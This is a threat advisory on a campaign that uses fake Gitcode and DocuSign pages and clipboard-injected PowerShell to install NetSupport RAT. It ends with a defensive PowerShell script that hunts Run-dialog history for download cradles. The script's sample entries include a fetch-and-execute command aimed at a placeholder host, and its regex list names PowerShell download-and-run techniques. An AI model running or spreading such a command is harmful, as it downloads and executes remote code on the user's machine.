Malicious Scripts Delivered via Fake Gitcode and Docusign Pages

Image credit: Freepik

VTA-004518 – Malicious Scripts Delivered via Fake Gitcode and Docusign Pages

A new cyber campaign is using fake websites impersonating Gitcode and DocuSign to trick users into running malicious PowerShell scripts, ultimately infecting systems with NetSupport RAT malware. Researchers found that these deceptive sites prompt victims to copy and execute PowerShell commands, which then download additional scripts from external servers.

The attack involves multiple stages, where each script retrieves and runs another, eventually deploying the remote access trojan (RAT). Some spoofed DocuSign sites use CAPTCHA verification lures—when users complete the check, a malicious PowerShell command is silently copied to their clipboard. Victims are then instructed to paste and run it via the Windows Run dialog, unknowingly triggering the infection.

The script establishes persistence by downloading a file from GitHub, ensuring the malware runs at system startup. Further stages retrieve a ZIP archive containing an executable that installs NetSupport RAT. This multi-stage approach helps evade detection and complicates investigations.

While the attackers remain unidentified, the tactics resemble past SocGholish (FakeUpdates) campaigns. NetSupport Manager, a legitimate tool, has been frequently abused by threat actors like FIN7 and Storm-0408 for remote access.

Severity:
Medium

Attack Surface:
Email, Endpoint, Remote Access Service, Web Browser

Tactics:
Command and Control, Defense Evasion, Execution, Initial Access, Persistence

Techniques:
T1059.001 – Command-Line Interface: PowerShell
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys
T1204.002 – User Execution: Malicious File
T1566.002 – Phishing: Spearphishing Link

Indicators of Compromise:
1. https://otx.alienvault.com/pulse/6841edc5bd14ff20dc36b897

References:
1. https://dti.domaintools.com/how-threat-actors-exploit-human-trust/

SuperPRO’s Threat Countermeasures Procedures:
1. Avoid copying and running PowerShell commands from untrusted websites.
2. Verify website URLs before interacting with login or CAPTCHA prompts.
3. Disable automatic script execution in PowerShell via Group Policy.
4. Monitor clipboard activity for unexpected PowerShell commands.
5. Keep endpoint security tools updated to detect multi-stage script attacks.
6. Educate users on social engineering tactics involving fake verification checks.
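As an added example (not part of the advisory or its sources), the following PowerShell hunt applies countermeasure 4 to the infection step described above: the Run dialog keeps a history of typed commands under the RunMRU registry key, so a PowerShell download cradle there indicates a user pasted a clipboard-delivered command. The pattern list and the sample entries are constructed for illustration, not indicators from the advisory.

```powershell
# Added example (not from the advisory): hunt the Run-dialog history for the
# paste-and-run pattern. Regex patterns and sample entries are assumptions.

$SuspiciousPatterns = @(
    'powershell[^\s]*\s.*-(w|win|windowstyle)\s+h',        # hidden window
    '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}',     # base64 payload
    '\b(iwr|irm|iex|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression)\b',
    'DownloadString|DownloadFile|Net\.WebClient',          # classic cradles
    'mshta\s+https?://'                                    # remote HTA
)

function Test-SuspiciousRunCommand {
    # Returns $true when a Run-dialog command matches any cradle pattern.
    param([Parameter(Mandatory)][string]$Command)
    foreach ($p in $SuspiciousPatterns) {
        if ($Command -match $p) { return $true }
    }
    return $false
}

function Get-RunMruEntries {
    # Reads the current user's Run-dialog history (Windows only).
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    $props.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |          # values are named a, b, c ...
        ForEach-Object { ($_.Value -replace '\\1$', '').Trim() }  # strip trailing "\1"
}

# Constructed sample entries standing in for a real RunMRU history.
$sample = @(
    'notepad',
    'powershell -w hidden -c "iwr https://example.invalid/a.ps1 | iex"',
    'cmd /c echo hello'
)

# On a Windows host, append the live history to the constructed samples.
$live = if ($env:OS -eq 'Windows_NT') { @(Get-RunMruEntries) } else { @() }
foreach ($cmd in ($sample + $live)) {
    $flag = if (Test-SuspiciousRunCommand $cmd) { 'SUSPICIOUS' } else { 'ok' }
    '{0,-10} {1}' -f $flag, $cmd
}
```

Run it under the affected user's context, since RunMRU lives in HKCU; pair it with PowerShell script block logging (Event ID 4104) to see what the pasted command actually executed.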

Contributed by: Fatini